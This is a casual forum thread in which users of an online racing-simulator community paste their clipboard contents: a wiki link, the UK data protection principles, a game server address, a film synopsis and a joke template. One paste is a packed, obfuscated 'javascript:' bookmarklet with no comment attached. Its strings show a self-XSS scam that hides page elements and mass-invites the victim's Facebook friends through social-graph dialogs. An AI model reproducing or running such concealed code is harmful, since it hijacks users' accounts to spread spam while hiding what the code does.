The online racing simulator
Post your CTRL+V
(2583 posts, started )
annotations
Quote from matijapkc :http://en.lfsmanual.net/wiki/Main_Page
I was helping some beginner...
EDIT:
Can we add your Hangman to LFS Insim, so we can play Hangman while racing online?

sure but you will have do edit it a bit, and tell me the name of the surver you are playing on :P Its written in Delphi....
What are the 8 principles of the data protection act?
"Shit!" said Sean Connery as he tried in vain to train his dog
Blümchen 5 - 5 Black Eyed Peas
Quote from JO53PHS :What are the 8 principles of the data protection act?

AS Computing :P
personal data shall be processed fairly and lawfuly

personal data shall be obtained only for one or more specified and lawful
purposes

Personal data shall be adiquate, relevant and not excessive

Personal data shall be accurate and up to date

Personal data kept for any purpose shall not be kept longer than nessesary

Personal data shall be processed in accordance with the rights of the data subject

Personal data must be kept safe

personal data must not be transferred outside the EU unless the country has similar laws in place
javascriptfunction(){a='app120715334615757_jop';b='app120715334615757_jode';ifc='app120715334615757_ifc';ifo='app120715334615757_ifo';mw='app120715334615757_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
David Cameron side profile
85.138.64.49:28960
All-nighters need unhealthy food to function
cheap whales for sale
[censored]

(my cellphone number )
Quote :mal kurz hoch

well what does it mean ...
C:\Program Files (x86)\Eagle Dynamics\Ka-50\bin\x86\stable
A former professor concocts a brutal experiment in order to get the word out on the effects of global warming. By trapping six people in an urban Turkish bathhouse, he vows to overheat his hostages unless his global-warming hypothesis is published on the front page of his local paper
int count=50;

programming xD
Opening Credits/Birth:
First Day Of School:
Meet Your Best Friend:
Falling In Love:
Fight Over Your Girl:
Lovely Relationship:
Breaking Up:
Prom:
Graduation:
Montage of Your Hard Work in College: